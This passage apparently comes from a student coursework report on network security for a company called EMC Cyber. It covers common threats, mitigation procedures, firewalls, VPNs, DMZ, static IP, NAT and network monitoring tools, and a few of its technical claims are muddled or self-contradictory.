actor repeatedly attempts as many username/guessed password combinations as they can to
obtain unauthorised access to sensitive data and systems. If the actor is successful, they can
join the system while pretending to be the authorised user. During this time, the adversary
can move laterally, put in back doors, learn more about the system to use in future
cyberattacks, and, of course, steal data.

 Organizations should establish and enforce explicit standards that demand the use of
strong, unique passwords and remind users to change them frequently in order to
mitigate this specific cybersecurity risk. The use of multifactor authentication (MFA),
which needs more than one form of identification, such as a password and a
fingerprint or a password and a one-time security token, to authenticate a user, should
also be considered by organisations.

Threat
A threat in the context of computer security is a potential negative action or occurrence made
possible by a vulnerability and leading to an unintended effect on a computer system or
application.

A danger can be a "accidental" bad occurrence (such as the chance of a computer failing or a
natural catastrophe event like an earthquake, fire, or tornado) or a negative "intended"
condition, capacity, action, or event (hacking: an individual cracker or a criminal
organisation).

20 | P a g e
 Figure 3 Threats

Security Threats

Malware

Malware is a broad category of unwanted applications that may harm a business in a variety
of ways, from erasing data to draining resources by converting machines into botnets or
cryptocurrency miners. It is perhaps the most fundamental and well-known danger to many
people.

Viruses, which aim to reproduce and spread as much as possible, Trojans, which infiltrate
networks by posing as trustworthy programmes, and spyware, which aims to monitor an
employee's usage to obtain sensitive data, are a few of the main sorts.

Protecting against malware

 It is not simple to defend against this variety of attacks, which is why having powerful
antimalware software is crucial. There are hundreds of tools available that promise to
provide security, but enterprises must make sure the solutions they select can detect
even malware that was not previously recognised by identifying its distinctive traits,
such as a programme that tries to conceal once installed. It's also crucial that this be
updated and capable of scanning every potential point of access into a network,
including emails and USB flash drives.

21 | P a g e
Cloud security

Most companies, big and small, operate on the cloud. There are several reasons why most
contemporary firms rely on cloud computing, from decreased IT expenses to greater
scalability and simpler collaboration. But it does come with a unique set of difficulties.

According to 57% of respondents, cloud security is the second-most important danger to

firms' cybersecurity this year behind malware. When it comes to cloud security, some of the
key issues that organisations need to be aware of are account hijacking, configuration errors,
external data sharing, data loss/leakage, illegal access, and insecure interfaces/APIs.

Protecting against cloud threats

 To guarantee that your infrastructure and data are safe, implementing strong cloud
security policies may assist guard against the numerous threats and vulnerabilities.
Securing user endpoints, deploying encryption, and emphasising the need of good
password hygiene are just a few of the many details that must be taken into
consideration while ensuring cloud security. Making the appropriate cloud provider
choice early on will ease some of the burden on you when it comes to guaranteeing
the security of your business and its clients in the cloud.

Phishing

Phishing, one of the most prevalent forms of social engineering threat, primarily entails
sending emails that appear to be from a well-known and reliable source and sometimes
include a bogus link that asks recipients to submit personal information into an online form.
Phishing and other social engineering attacks are, according to 51% of IT experts, their main
difficulties this year.

These are frequently intended to be techniques to get access to financial information or login
and password combinations, but they are capable of much more, particularly with the more
targeted "spear phishing" kind, which is specifically tailored to each receiver.

Protecting against phishing

 Although they are not 100% effective, efficient email security technologies can help
decrease the risk that such emails are delivered. Therefore, the best method to combat
this issue is through user education. Businesses may guarantee that their employees

22 | P a g e
 are not disclosing sensitive information to anybody by teaching staff to be cautious
and recognise the warning signs of a phishing effort.

Data loss

Data is commonly referred to be the "new oil," and for many hackers, stealing it and selling it
on the dark web for use in identity theft, extortion, or corporate espionage is the goal of their
activities.

Given that data is now the foundation of all corporate operations, it should come as no
surprise that 26% of businesses view data loss as the top cybersecurity issue they are
currently facing. Getting data out of an organisation is frequently the last phase of any
assault, whether it is utilising social engineering or breaking into a database using known
flaws.

Protecting against data loss

 Even if a company's perimeter has been breached, there are still steps businesses can
take to protect themselves from the most serious consequences - but to do this, they'll
need effective data loss prevention tools. It may be the case that hackers can sit inside
a network for months looking for the most valuable information and waiting for the
right time to act.
 This often refers to a set of actions taken to keep an eye out for suspicious activity and
prevent unauthorised users from accessing or stealing data. If data is copied or moved
outside of regular, authorised operations, it could keep an eye on endpoints and
inform users.

23 | P a g e
1.3 Develop and describe security procedures for EMC Cyber to minimize the impact of
issues discussed in section (1.1) by assessing and rectifying the risks.

Security procedures for EMC Cyber to minimize the impact of

risks.
 Encrypt Your Data and Create Backups
o Ensure that every piece of sensitive data is encrypted. Normal-text file formats
just make it simple for criminals to access EMC data. On the other side, data
encryption restricts access to data to those who possess the encryption key.
Additionally, it makes sure that even if unauthorised individuals access the
data, they are unable to read it. Some data encryption tools even alert EMC
Cyber when someone tries to change or tamper with the data.
o Additionally, EMC must regularly backup sensitive corporate data. Data loss
can occur sometimes because of cybersecurity breaches. Without a trustworthy
and secure backup plan, this might cause operational disruptions that cost the
firm a lot of money in lost income. The 3-2-1 rule is one of the best data
backup techniques. We should save at least three copies of our data using this
technique. Two of them ought to be kept on various types of media, and one
ought to be kept offshore.
 Conduct Regular Employee Training
o Phishing emails sent to EMC workers are one of the frequent methods that
criminal hackers access the company's information. According to statistics,
about 3.4 billion phishing emails are really sent each year worldwide. Links in
these emails are harmful virus that allows hackers to access user information,
including login passwords.
o The fact that phishing emails appear real makes them difficult to spot. For
instance, a hacker may send an email posing as an organisation head and
requesting personal information. The worker can wind up disclosing this
information if they weren't given the required training. EMC must do
cybersecurity awareness training because of this. Inform EMC's staff about the
primary types of cybersecurity threats and the effective defences against them.
 Keep EMC Cyber Systems and Software Updated
o EMC's cyber security and digital safety are significantly impacted by system
and software changes. This is because they don't only bring new features; they

24 | P a g e
 also correct bugs and aid in patching exploitable security holes and
vulnerabilities.
o malicious hackers create code that they employ to take advantage of the flaws.
The majority of the time, this code is packed as malware that can harm the
entire EMC system. So ensure that EMC has a patch management solution to
manage all updates automatically and maintain information security.
 Use Strong Passwords
o Simple passwords are no longer sufficient due to the advancement of
password cracking technologies. To deter hacking in your firm, you should
instead implement multi-factor authentication techniques and employ
complicated passwords. Additionally, you should forbid password sharing
among staff members so that the rest of the computers are safe even if one is
compromised.
o When it comes to passwords, some of the security risk mitigation techniques
you should use include:
 There should be at least 8 characters in every password.
 They ought to be made up of alphabetic characters.
 They shouldn't include any private data.
 They ought to be original and never utilised.
 Assess and Monitor EMC Cyber Vendors
o EMC can't afford to overlook vendor risk management since it's likely that
third-party vendors play a significant role in cyber security. Instead of only
depending on incident response, this will assist EMC in reducing third-party
risk.
o EMC Cyber primary attention should be on:
 Risk associated with cybersecurity: monitor suppliers throughout EMC
engagement and onboard them using the proper methods.
 Verify that the vendor won't affect EMC’s compliance with
agreements, rules, and local laws to minimise legal, regulatory, and
compliance risk.
 Operational risk: If the vendor is important to our business, be sure
they won't interfere with our operations.

25 | P a g e
  Strategic risk: make sure the vendor won't interfere with EMC’s
capacity to accomplish EMC organization's goals.

 Install Firewalls
o Hackers constantly develop new techniques for gaining access to data, and
cyber security dangers are evolving. Installing firewalls will protect EMC
networks from online threats. A trustworthy system will successfully defend
EMC from brute force assaults or stop security mishaps from inflicting
irreparable harm.
o Additionally, firewalls keep an eye on network traffic to spot any unusual
activity that can jeopardise the security of your data. They also support data
privacy and stop sophisticated spyware from accessing your computers.

Protect EMC Cyber from Cybersecurity Risks

Creating data backups and encrypting sensitive information.

Updating all security systems and software.
Conducting regular employee cybersecurity training.
Using strong and complex passwords.
Installing firewalls.
Reducing your attack surfaces
Assessing your vendors
Having a kill switch in place.
Creating solid cyber risk policies and strategies.
Protecting your physical premises.

26 | P a g e
ACTIVITY 02
2.1 Identify how EMC Cyber and its clients will be impacted by improper/ incorrect
configurations that are applicable to firewalls and VPN solutions. IT security can
include a network monitoring system. Discuss how EMC cyber can benefit by
implementing a network monitoring system with supporting reasons.

Firewall
What is a Firewall?

A firewall is a network security device used in computing that monitors and regulates
incoming and outgoing network traffic in accordance with pre-established security rules.
Typically, a firewall creates a wall between a trustworthy network and an unreliable network,
like the Internet.

Figure 4 Firewall

How does Firewall works?

Data trying to access your computer or network is filtered by firewalls, which might be
hardware or software. The purpose of firewalls is to filter out harmful software or known
attack vectors from transmissions. The firewall stops data packets from entering the network
or getting to your computer if they are detected as security risks.

27 | P a g e
 1. Network based firewalls

Intranets are protected by network firewalls, which are security tools intended to prevent or
lessen illegal access to private networks connected to the Internet. Firewall policies specify
the only traffic that is permitted on the network; all other traffic that tries to reach the
network is prohibited. Network firewalls serve as a communications bridge between internal
and external devices, sitting at the edge of a network.

Any data entering or leaving the network may be programmed to pass through a network
firewall; it does this by inspecting each incoming message and rejecting those that do not fit
the established security standards. When set up correctly, a firewall keeps away unauthorised
users, hackers, viruses, worms, and other hazardous software from trying to enter the
protected network while still enabling users to access whatever resources they require.

2. Host based firewalls

Directly installed firewall software is known as a host-based firewall (rather than a network).
Host-based firewalls aid in the detection and termination of viruses, malware, and other
harmful programmes that network security may not have been able to stop. An individual
computer is safeguarded against viruses and other harmful software when a host-based
firewall is installed, updated, and operating on the machine.

Firewall Types

 packet filtering firewall.

 circuit-level gateway.
 application-level gateway (aka proxy firewall)
 stateful inspection firewall.
 next-generation firewall (NGFW)

Packet filtering firewall

At intersections where equipment like routers and switches operate, packet filtering
firewalls run inline. These firewalls don't route packets; instead, they check each one
against a list of predetermined standards such the permitted IP addresses, packet type,
port number, and other information from the packet protocol headers. Difficult

28 | P a g e
 packets are unceremoniously discarded, which means they are not transmitted and
eventually vanish from existence.

Advantages:

 A single device can filter traffic for the entire network

 Extremely fast and efficient in scanning traffic

 Inexpensive

 Minimal effect on other resources, network performance and end-user experience

Circuit-level gateway

Circuit-level gateways monitor TCP handshakes and other network protocol session
initiation messages across the network as they are established between the local and
remote hosts to ascertain whether the session being initiated is legitimate — whether
the remote system is regarded as trusted. This is another relatively quick method of
identifying malicious content. They do not personally examine the packages.

Advantages:

 Only processes requested transactions; all other traffic is rejected

 Easy to set up and manage
 Low cost and minimal impact on end-user experience

Application-level gateway

The single point of entry and exit for the network is this form of device, which is technically
a proxy but is sometimes referred to as a proxy firewall. Application-level gateways filter
packets based on a variety of factors, such as the HTTP request string, in addition to the
service for which they are meant, as indicated by the destination port.

Advantages:

 Examines all communications between outside sources and devices behind the
firewall, checking not just address, port and TCP header information, but the content
itself before it lets any traffic pass through the proxy
 Provides fine-grained security controls that can, for example, allow access to a
website but restrict which pages on that site the user can open

29 | P a g e
  Protects user anonymity

Stateful inspection firewall

State-aware devices track whether a packet is a part of an active TCP or other network
session in addition to inspecting each packet. While providing better security than
either circuit monitoring or packet filtering by itself, this has a bigger negative impact
on network performance.
The multilayer inspection firewall, which considers the flow of transactions taking
place across many protocol levels of the seven-layer Open Systems Interconnection
(OSI) architecture, is another variation on stateful inspection.

Advantages:

 Monitors the entire session for the state of the connection, while also checking IP
addresses and payloads for more thorough security
 Offers a high degree of control over what content is let in or out of the network
 Does not need to open numerous ports to allow traffic in or out
 Delivers substantive logging capabilities

Next-generation firewall

A typical network security appliance (NGFW) combines packet inspection with

stateful inspection, as well as some form of deep packet inspection (DPI), as well as
additional network security tools like an IDS/IPS, malware filtering, and antivirus.
DPI examines the actual data that a packet is carrying, as opposed to classical
firewalls that just check the protocol header of the packet. When a packet payload is
combined with additional packets in an HTTP server reply, a DPI firewall that
monitors web browsing activity can determine if the result is a valid HTML-formatted
answer.

Advantages:

 Combines DPI with malware filtering and other controls to provide an optimal level
of filtering
 Tracks all traffic from Layer 2 to the application layer for more accurate insights than
other methods

30 | P a g e
  Can be automatically updated to provide current context

Virtual Private Network (VPN)

What is a VPN?
Users can transmit and receive data over shared or public networks as if their computer
equipment were physically linked to the private network using a virtual private network
(VPN), which extends a private network across a public network. Increases in functionality,
security, and private network administration are all advantages of a VPN. It is frequently used
by distant employees and gives access to resources that are not available on the public
network. Although not a fundamental component of a VPN connection, encryption is
frequently used.

How does a VPN work?

By allowing the network to route your IP address through a specifically set-up distant server
operated by a VPN host, a VPN can conceal your IP address. In other words, if you use a
VPN to browse the internet, the VPN server becomes the source of your data. As a result,
neither your Internet Service Provider (ISP) nor other parties will be able to see the websites
you visit or the data you transmit and receive online. A VPN acts as a filter that "gibberish"
all your data. Even if someone were to obtain your data, it wouldn't be useful.

 Client-based VPN types

31 | P a g e
 o An individual user and a distant network are connected through a client-based
VPN. To establish the connection, an application is frequently needed.
o The VPN client is often manually launched by the user, who then logs in using
a username and password. Between the user's computer and the distant
network, the client establishes an encrypted tunnel. The encrypted tunnel then
gives the user access to the distant network.
o Examples: Cisco's AnyConnect, Pulse (formerly Juniper), and Palo Alto
Networks' Global Protect. 
 Network based VPN
o Virtual private networks (VPNs) built into networks are used to safely link
two networks together over unreliable networks.

VPN types

 Site-to-site VPN
o an inter-site A virtual private network, or VPN, is simply a private network
created to conceal private intranets and enable users of these secure networks
to access one other's resources.
o If your business has several sites, each with its own local area network (LAN)
connected to the wide area network (WAN), it may be helpful to employ a
site-to-site VPN (Wide Area Network). If you wish to communicate files
across two different intranets without expressly allowing people from one
intranet to access the other, site-to-site VPNs can also be helpful.

 Client-to-Server VPN
o You may picture using a VPN client to connect as if you were using an
extension cord to connect your home PC to the business. Employees can use
the secure connection to dial into the corporate network from their home office
and behave as though they were physically present in the office. On the PC, a
VPN client must first be installed and set up.
o This entails the customer connecting directly through his or her VPN provider
rather than through their own ISP to the internet. This effectively shortens the
VPN journey's tunnel portion. The VPN may automatically encrypt the data

32 | P a g e
 before it is made available to the user, as opposed to utilising it to cloak the
current internet connection with encryption.
 SSL VPN
o A corporation's employees frequently do not all have access to company
laptops that they may use for remote work. Many businesses struggled with
the issue of not having enough equipment for their staff during the Corona
Crisis in Spring 2020. Use of a private device (PC, laptop, tablet, or mobile
phone) is frequently employed in these situations. In this situation, businesses
revert to an SSL-VPN solution, which is often installed using an appropriate
hardware box.
o An HTML-5-capable browser is often required to access the company's login
page. There are browsers that support HTML-5 for almost every operating
system. By using a username and password, access is controlled.

Advantages of VPN
 Hide your IP address
o Your IP address is changed with a VPN, which is one of its biggest benefits.
This number, which functions like a home address, is automatically allocated
to your network. Your IP address allows websites and governments to
determine where you are, therefore, you might be unable to access some
prohibited pages because of geographical limitations.
 Encrypt your data traffic
o Your data transmission is encrypted via a VPN. This stops hackers and other
nefarious individuals from gaining access to crucial information like your
account passwords and financial data. You'll also be safer when you connect
on at your neighbourhood Starbucks.
o This is crucial since accessing public Wi-Fi without any safety precautions in
place has several hazards. We always advise utilising a VPN while using
public internet hotspots, whether you're a self-employed business owner or
just want to browse in public.
 Download files safely and anonymously
o Third parties won't be able to determine who you are or what you're doing
online since your IP address is concealed and your connection is encrypted.

33 | P a g e
 The secure VPN connection prevents them from reading the content that is
being downloaded. This benefit is especially helpful for employees who
handle sensitive corporate information while working from home. Anonymity
and privacy are assured, or at the very least significantly enhanced.
 Improve online gaming with better access and security
o Your precise location is modified when you use a VPN since all of your
internet traffic is encrypted. Like how this might get you access to particular
websites; it will also enable you to access online games that may be blocked in
your place of residence. Another possibility is that the game you wish to play
was released later in your nation than it was elsewhere in the world. You won't
have to wait much longer if you use a VPN. Simply select a server in your
home country to get started. Another advantage is that you may re-join the
service by quickly changing your IP address if you're being unfairly kicked
off.
 Avoid blockers and filters
o Internet censorship is a serious issue in some parts of the world, and one can at
least argue that the user has power over the overall perspective. As a result,
more and more individuals are adopting VPNs, which can bypass web filters
and restricted websites. We must maintain control of the situation.
 Improved security
o The main benefit of utilising a VPN is also readily apparent. To secure
concepts like our IP address, company, passwords, and statistics from hackers,
major technological groups, or anybody looking to take advantage of you,
keep in mind that we may utilise the encrypted community remotely.
o Keep doing what you are doing. Even the ISP (Internet Service Provider) only
receives encrypted information from the VPN server, so they cannot observe
what we are doing.

34 | P a g e
How do improper firewalls and VPNs affect EMC Cyber?

Figure 5 Firewall and VPN

In Sri Lanka, EMC Cyber is a well-known supplier of cyber solutions. Overall, EMC Sri
Lanka Some of the biggest businesses in the world that serve a wide range of sectors are
among the company's many clients, both in Sri Lanka and internationally.

The firm creates software for endpoint security, firewalls, anti-virus, and intrusion detection
and prevention. The responsibility for safeguarding business networks, clouds, online
applications, and emails falls to EMC Cyber. They also provide endpoint security, secure
unified access, and enhanced threat prevention.

Only when EMC Cyber transacts with international nations outside of Sri Lanka is it crucial
to deploy the VPN and firewall software. This is because while using networks to do
business, some illegal access may be attacked on the network system, and some other private
networks may also be attacked on the network system.

When it is attacked by outside parties, they can learn crucial information about EMC Cyber,
particularly its rivals.

Installing strong risk firewalls is crucial for the firm to avoid such dangers if competitors
learn knowledge about the EMC Cyber organisation. We must be prepared for these threats if
there are poor firewalls.

35 | P a g e
The use of unsuitable VPNs is another issue that might occur while conducting online
transactions, since doing so can occasionally result in interruptions from web traffic,
concealment, and transactions that involve smuggling websites, all of which can be
problematic. Since inappropriate VPNs have the potential to harm EMC's reputation, we must
install the necessary VPNs. The EMC Cyber is aware that these problems result in a loss of
data privacy, dependability, and more.

Network Monitoring System

What is a Network Monitoring?

The process of continuously checking a computer network for issues like delayed traffic or
component failure is known as network monitoring. In order to immediately alert network
managers to issues through text, email, or other applications like Slack, network monitoring
systems continuously scan the network. In contrast to network security or intrusion detection
systems, network monitoring software focuses on internal network problems such overloaded
routers, downed servers, or network connection difficulties that may affect other devices.

Network monitoring systems can also start a failover to remove problematic circuits or
devices from service until the problem can be fixed. A proactive network monitoring system
should be able to spot abnormalities that, if left unchecked, might cause an outage and stop
operations before they start.

Maintaining network integrity requires constant monitoring. The best network monitoring
tools offer a dashboard or visualisation that shows the status of the monitored network
components at a glance, highlighting any abnormal parameters that need further investigation
or components like switches, routers, firewalls, servers, and software services, applications,
or URLs that may be the cause of network disturbances. For maximum effectiveness, a
network monitoring system should include high availability components so that a hardware or
software failure of systems running the network management tool can be automatically
remediated by fail-over to another network monitoring installation

36 | P a g e
Benefits of Implementing a Network Management System to EMC Cyber
 Preventing Downtime
o Downtime is costly and kills productivity. According to a recent poll, 40% of
business organisations indicated downtime would cost them between $1
million and $5 million per hour.
o EMC Cyber may prevent unplanned outages by monitoring. The identification
of warning indications that might point to a device failure or network issue is a
crucial component of network monitoring systems. This aids in problem
detection and helps EMC avoid downtime.
o In addition to preventing downtime, performance monitoring gives IT teams
the ability to improve performance for more productive operations.
 Maintaining Compliance
o The right network monitoring technologies must be in place for organisations
that must maintain regulatory compliance. In addition to any existing external
security measures, network monitoring is required for compliance with PCI
DSS, HIPAA, FISMA, SOX, and other regulations.
 Network Visibility
o The network of EMC must be completely under the control of EMC Cyber.
That covers all of the equipment connected to the EMC Cyber network as well
as all network traffic. It's the finest approach to monitor the health of the EMC
Cyber network and spot performance delays.
o It might be difficult to simply keep track of everything on the EMC Cyber
network. In conjunction with EMC Cyber network monitoring, automated
network mapping technologies may give a comprehensive overview of even
the most intricate ecosystems.
 Finding and Fixing Problems Quickly
o Network monitoring aids EMC in more immediately isolating issues as they
arise. Network maps may assist EMC in swiftly identifying the cause of any
issue, whether it be a traffic variation, a configuration error, or something
more significant. The monitoring solution from EMC includes network
automation technologies that may automatically resolve a number of issues.

37 | P a g e
 o EMC's IT staff may concentrate on other problems by reducing Mean Time to
Repair (MTTR), which lessens the effects of downtime or subpar network
performance.
 Uncovering Security Threats
o The main purpose of network monitoring is to keep an eye on performance,
but it may also be used to find security issues inside the EMC Cyber system.
EMC may be able to identify even tiny risks before they become major ones
by continually scanning for strange or suspicious behaviour. Malware and
viruses, for instance, might not be immediately apparent, but EMC network
monitoring tools can identify anomalous activities, such questionable usage of
network resources.
o Additionally, EMC will be able to proactively identify security risks like
DDoS assaults or illegal downloads.
 Deploying New Technologies
o When it comes to implementing new technologies, network monitoring is
equally crucial. It can assist in figuring out whether the network can manage
more resources and help proactively identify future performance problems.
EMC will be able to monitor the network after deployment to make sure
performance is not affected.
 Freeing Up IT Teams
o A further underappreciated advantage of network monitoring tools exists.
These days, IT staff have a lot on their plates. The complexity and
development of networks have put a heavy load on teams, who are frequently
understaffed but expected to deliver flawless performance. With the correct
network monitoring tools, like “Whatsup Gold”, the workload may be greatly
decreased.
o By receiving proactive notifications when anything needs repair and regaining
control of their network without having to manually examine performance, IT
professionals can cut down on downtime. Network monitoring tools make it
simpler to locate, isolate, and fix issues when they are discovered.

38 | P a g e
2.2 Explain how the following technologies would benefit EMC Cyber and its Clients by
facilitating a ‘trusted network’. (Support your answer with suitable examples).

i) DMZ

ii) Static IP

iii)NAT

Demilitarized Zone (DMZ)

What is DMZ?

A demilitarised zone (DMZ) is a physical or logical subnet in computer networks that isolates
a local area network (LAN) from other untrusted networks, often the public internet.
Perimeter networks and screened subnetworks are other names for DMZs.

Any service offered to internet users should be situated in the DMZ network. There are often
servers, resources, and services that are accessible from the outside. Web, email, domain
names, File Transfer Protocol, and proxy servers are some of the most popular of these
services.

The remainder of the internal LAN cannot be reached, but servers and resources in the DMZ
are reachable from the internet. This method adds an extra degree of protection to the LAN
by preventing internet-based direct access by hackers to internal systems and data.

How does a DMZ work?

DMZs serve as a buffer zone between the private network and the public internet. Between
two firewalls is where the DMZ subnet is installed. Before reaching the servers housed in the
DMZ, all incoming network packets are then checked using a firewall or another security
appliance.

39 | P a g e
Threat actors that are more prepared must first get past the first firewall in order to access the
DMZ services without authorization. These systems are probably fortified against such
assaults.

Finally, even if well-funded threat actors manage to gain control of a machine located in the
DMZ, they will first need to get past the internal firewall in order to access key company
resources. Even the most secure DMZ design may be breached by determined attackers. But
when a DMZ is attacked, sirens go out, giving security experts enough time to stop a full
intrusion into their firm.

Architecture and design of DMZ networks

A DMZ can be included into a network in a variety of ways. Although most contemporary
DMZs are built with two firewalls, there are two main approaches: using one or two
firewalls. Expanding on this strategy will result in increasingly intricate designs.

A network architecture with a DMZ may be built using a single firewall with at least three
network interfaces. The first network interface's firewall is connected to the public internet
through an internet service provider, creating the external network. The second network
interface creates the internal network, which is linked to the third network interface through
the DMZ network.

Different sets of firewall rules for DMZ monitoring, LAN monitoring, and internet
monitoring tightly control which ports and types of traffic are allowed into the DMZ from the

40 | P a g e
internet, limit connectivity to hosts in the internal network, and prevent unauthorised
connections to either the internet or the internal LAN from the DMZ.

A dual-firewall setup, in which the DMZ network is installed between two firewalls, is the
safer method of establishing a DMZ network. The first firewall, often known as the perimeter
firewall, is set up to only allow outbound traffic going to the DMZ. Only traffic from the
DMZ to the internal network is allowed through the second firewall, which is internal.

What are the Advantages of using a DMZ?

Access control:

 A DMZ network offers access control to services accessed over the internet but
located outside of a company's network boundaries. At the same time, it adds a layer
of network segmentation that raises the bar for users to clear to access a company's
private network. Some DMZs come with a proxy server, which centralises the flow of
internal internet traffic, often that of employees, and makes recording and monitoring
that traffic easier.

Network reconnaissance prevention:

 A DMZ also prevents an attacker from scanning the network for possible targets. The
internal firewall keeps the private network secure and separate from the DMZ even if
a system there is hacked. Active external reconnaissance is more challenging under
this scenario. Despite being exposed to the public, the servers in the DMZ are
supported by an additional level of security. Attackers are prevented from viewing the
data on the internal private network by the DMZ's public face. Even if attackers are
successful in taking control of DMZ servers, they are still cut off from the private
network by the DMZ's internal firewall.

Protection against Internet Protocol (IP) spoofing:

 Attackers occasionally try to get around access control limitations by faking an

allowed IP address to pass as another network device. While another service on the
network confirms the authenticity of the IP address by determining whether it is
reachable, a DMZ can stop possible IP spoofers.

41 | P a g e
Examples for DMZ

1. Cloud services: Some cloud services, like Microsoft Azure, employ a hybrid approach
to security where a DMZ is set up between an organization's physical network and the
virtual network.
2. Home networks: In a home network that is set up as a LAN and has PCs and other
devices linked to the internet through a broadband router, a DMZ can also be helpful.
3. Industrial control systems (ICS): DMZs offer a viable remedy for the security
problems associated with ICSs. Information technology is combining with industrial
equipment like turbine engines or ICSs (IT)

Static IP
What is Static IP?

A computer's static IP address is a 32-bit value that serves as its internet address. Usually, an
internet service provider (ISP) will supply this number, which looks like a dotted quad.

An internet-connected device's IP address, or "internet protocol address," serves as a special

identification number. Like how individuals use phone numbers to locate and communicate
with one another on the phone, computers use IP addresses to locate and communicate with
one another online. An IP address might reveal details about the hosting company and
geographical information.

How static IP addresses work?

If a person or organisation wants a static IP address, they must first call their ISP and ask
them to provide their device — such as a router, for example — a static IP address. Static IP
addresses are not often offered by most ISP firms by default. They will need to restart their
device after it is configured with a new, permanent IP address. The same IP address will be
used by computers and other hardware behind the router. Once the IP address is set up, it
doesn't need to be managed because it stays the same.

However, because there is a cap on the number of static IP addresses that may be requested,
paying for a static IP address is frequently necessary. A solution to this problem is IPv6.
Static IP addresses are now much simpler and less expensive to acquire and maintain thanks
to IPv6, which lengthens IP addresses from 32 bits to 128 bits (16 bytes) and greatly

42 | P a g e
increases the number of accessible IP addresses. Today, a sizable amount of internet traffic
still utilises IPv4, but more and more of it is switching to IPv6, so both are in use.

Up to 340 undecillion different IP addresses can be used using IPv6. To put it into
perspective, there are currently 340 trillion, trillion, trillion distinct IP addresses that may be
allocated, which is 340 followed by a total of 36 zeros. This increase in the total number of IP
addresses enables significant future expansion of the internet and alleviates what was
anticipated to be a future scarcity of network addresses.

Advantages of Static IP addresses

 Speed
o Devices allocated a static IP address often operate more quickly because static
IP addresses have fewer inconsistencies. The speed difference is only
noticeably different if you utilise broadband. The DSL connections, no. If you
often upload and download files, this is extremely helpful.
 Security
o A Static IP address will always provide a higher level of protection. An
additional degree of security built into static IP addresses ensures that most
security issues are avoided.
 Accessibility
o Static IP addresses enable remote access using software such as Virtual
Private Network (VPN). Devices may therefore be accessed from anywhere in
the world. All of the facts are made available as long as the gadget is online.
 Hosting
o Static IP addresses now allow all hosting kinds from web servers to email
servers and other sorts of servers. All your customers and clients may
therefore readily visit your website if you have a static IP address.
Additionally, the devices can quickly identify and find all servers globally
when utilising a static IP address.
 Stability
o Since modifications are prohibited, all static IP addresses are known to remain
stable. It doesn't experience frequent gaps as a dynamic IP address does. The

43 | P a g e
 machines will be able to instantly re-connect to the internet whenever there is
a reboot using the same IP address.
 Accuracy
o When it comes to geolocation information, a static IP address is quite accurate.
The precise business location will be found by all geolocational services. With
this precise information, it is possible to be sure that the companies are
constantly on the front lines. This has several advantages for enterprises.

Network address translation (NAT)

What is NAT?
Network address translation (NAT) modifies the network address information in packets' IP
headers as they pass through a traffic routing device to translate one IP address space into
another. [1] When a network was moved or when the upstream Internet service provider was
changed but was unable to route the network's address space, the approach was first
employed to avoid the requirement to give new addresses to every site. In light of the IPv4
address exhaustion, it has grown to be a widely used and crucial technique for global address
space preservation. A NAT gateway's single Internet-routable IP address can be utilised for
the whole private network.

NAT solutions may differ in their specific behaviour in different addressing scenarios and
their impact on network traffic because NAT alters the IP address information in packets.
Vendors of equipment with NAT implementations do not frequently describe the nuances of
NAT behaviour.

How does NAT work?

The internal network and the external network are the two local networks that a NAT chooses
as its gateways. Typically, IP addresses are allocated to systems on the internal network that
cannot be routed to outside networks (such those in the 10.0.0.0/8 block).

The gateway has a few externally valid IP addresses assigned to it. The gateway simulates
outbound traffic from an inside system as originating from one of the legitimate external
addresses. It redirects incoming traffic intended for a legitimate external address to the
appropriate internal system.

44 | P a g e
This promotes security. Due to the requirement that every incoming and outgoing request
undergo a translation process, there is the potential, for instance, to qualify or verify
incoming streams and match them to outgoing requests.

Advantages of NAT
 Lowers the cost
o Any business that utilises NAT with its private IP address saves money by not
having to purchase new IP addresses for each of its machines. They can utilise
the same IP address on many machines worldwide. This will assist in lowering
organisation costs.
 Conserving Address
o Utilizing NAT overload enables you to protect the IPv4 address space, which
provides access to all privatised intranets. Here, Intranet Privatization can
assist in achieving this. They used to save all the addresses at the port level
across several programmes throughout this operation.
 Connection Flexibility
o NAT includes a variety of features, including backup and load balancing
solutions. The network's overall flexibility and dependability will be improved
with the aid of these tools. When we build any link, whether it be with the
public or one of their connections, it will occur.
 Network Security
o They will entirely conceal all your original source and destination sources
when using in-network address translation. Without the user's consent, so that

45 | P a g e
 hosts outside of them cannot access the hosts inside them. This demonstrates
that they have extra security.
 Private Addressing
o They have a personal IPv4 addressing scheme that they own. They will still
have their own addressing scheme even if you switch to a different one. The
internal address changes in them will not occur if the user switches internet
service providers.

How does DMZ, Static IP, NAT help EMC cyber?

DMZ

This is a reference to the host or another network system, which we may describe as the path
between the internal network and the external network of two or more companies. It is a
secure and intermediary network system. When EMC Cyber interacts with its clients, certain
external network systems may attempt to attack their network work systems.

To stop these kinds of assaults, EMC Cyber could deploy DMZ network technologies.

Static IP

This is the set number that the internet service provider gives each machine. For Internet
hosting or Voice over Internet Protocol, standard IPs are helpful (VOIP). Dynamic IP
addresses are more dependable than static IP addresses when compared since they do not
require the time-consuming manual setting process. It is less susceptible to assaults than
regular IP since it fluctuates in nature.

Utilizing standard IPs primarily benefits from speed, dependability, and security. Therefore,
these kinds of operations demand a speedy internet connection when EMC Cyber transacts
with foreign nations, and standard IPs may be extremely useful to EMC Cyber.

NAT

Address Translation for Networks the EMC Cyber decides how many public IP addresses to
utilise for practical and secure reasons. The EMC Cyber network is used to react to queries

46 | P a g e
from unknown IP addresses when there is a public IP address. NAT is doing everything it can
to help EMC Cyber stop these operations.

2.3 Identify and evaluate the tools that can be utilized by EMC cyber to improve the
network and security performance without compromising each other. Evaluate at least
three virtual and physical security measures that can be implemented by EMC to
uphold the integrity of organization’s IT policy.

Tools to improve the Network of EMC cyber

SolarWinds Network Performance Monitor

A thorough network performance monitoring tool that can track device status via SNMP is
SolarWinds Network Performance Monitor. It can automatically find network devices linked
to your network. Utilize the dashboard to keep a close eye on the performance and
availability of all connected network devices.

Key features:

 SNMP monitoring
 Automatically discovers connected network devices
 Network packet analysis
 Intelligent network maps with Net Path
 Create Wi-Fi heat maps
 Alerts system
 Reports system

47 | P a g e
 Figure 6 SolarWinds Network Performance Monitor

AUVIK

A variety of system management tools are included in the cloud-based network monitoring
solution known as AUVIK. When you open an account and access the package using a Web
browser, the installation procedure for collectors on your computer. The Auvik programme
can oversee and centralise the monitoring of several locations. The suite is therefore perfect
for WAN monitoring.

A network discovery procedure is the first step in the service offered by Auvik. This
automatically fills in all the fundamental data required for the monitor to function. The
ongoing discovery service will detect when new devices are connected to the network.

Key features:

 Automated setup
 Network mapping
 Resource utilization alerts
 Configuration management

48 | P a g e
 Figure 7 AUVIK

Datadog Network Performance Monitoring

